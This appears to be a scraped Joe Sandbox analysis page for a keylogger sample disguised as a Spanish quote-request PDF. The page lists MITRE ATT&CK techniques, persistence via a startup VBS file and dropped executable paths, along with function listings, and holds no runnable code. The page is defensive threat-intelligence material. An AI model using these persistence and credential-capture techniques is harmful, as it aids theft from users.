Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\aut18A8.tmp

C:\Users\user\AppData\Local\Temp\aut57A5.tmp

C:\Users\user\AppData\Local\Temp\autF13.tmp

C:\Users\user\AppData\Local\Temp\unrosined

C:\Users\user\AppData\Local\silvexes\palladiums.exe

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\palladiums.vbs

Static File Info

General

File Icon

Windows Analysis Report
Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe

Function 002042DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Function 002042A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Function 00242BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Function 00202CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Function 00238D45 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 300
COMMONLIBRARYCODE

Function 0024065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Function 0020344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 00202B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Function 00203170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre